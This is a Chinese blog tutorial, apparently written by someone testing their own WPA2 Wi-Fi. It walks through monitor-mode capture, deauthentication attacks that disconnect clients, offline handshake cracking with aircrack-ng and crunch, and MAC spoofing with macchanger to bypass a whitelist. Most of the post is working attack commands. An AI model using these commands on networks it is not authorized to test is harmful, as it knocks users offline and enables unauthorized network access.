文章目录
案列介绍:
辣条对自家的wifi进行wpa2加密,并密码设置为“%123654#”,并启用mac地址(白名单)过滤,关闭wds功能,这里我会对我的无线进行渗透测试
硬件:
tp-link无线路由器,一部华为手机(模拟正常用户上网),一台电脑(装载kali-linux),8187芯无线网卡(用于抓包和注入攻击)
软件:
kali-linux,(macchanger,iwconfig,airmon-ng,airodump-ng,aireplay-ng,aircrack-ng)
第一步:混杂模式踩点(确认攻击目标)
airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon
第二步:监听(抓取正常用户的通信数据包)
airodump-ng --bssid *** -c 11 -w /tmp/test wlan0mon #11是信道,**是路由器mac地址
第三步:注入攻击(踢掉合法用户,利用设备的自动的重连机制,捕获其握手包)
aireplay-ng -0 0 -a *** wlan0mon #对路由器全向攻击,导致所有正常用户掉线,这里的**也是路由器mac地址
aireplay-ng -0 0 -a *** -c *** wlan0mon #单点攻击,前面的*是路由器mac,后面的*是客户端mac
mdk3 wlan0mon d -s 120 -c 1,6,11 #踢掉所有的client
第四步:离线破解握手包
aircrack-ng -w zidian.txt test01.cap #用字典进行爆破,成功前提是字典合理
#或则不指定字典,直接实时匹配字符串组合,进行破解
crunch 1 8 123456789 | aircrack-ng test01.cap -e Test -w - #指定一个长度为8,使用字符串1到9进行组合,破解(-e 指定的是AP的ESSID,-w 指定的是密码字典 - 表示使用标准输入)
第五步:尝试登陆(由于无法登陆,我猜测是主人开启了mac地址过滤)
airmon-ng stop wlan0mon
正常连接尝试
第六步:mac地址欺骗
airodump-ng --bssid *** -c 11 -w /tmp/test wlan0mon
记录下正常用户的mac地址
ifconfig wlan0 down
macchanger -m *mac* wlan0
ifconfig wlan0 up
尝试连接ok
科普系列
1、大多数无线网卡,不支持注入攻击
2、wds是一种安全快速连接机制,依赖与pin 码,并且pin码多是8位数字,按4:3:1进行分配
3、混杂模式:只有开启混杂模式才能抓取,周边无线的数据包
如果文章对你有帮助,欢迎点击上方按钮打赏作者
暂无评论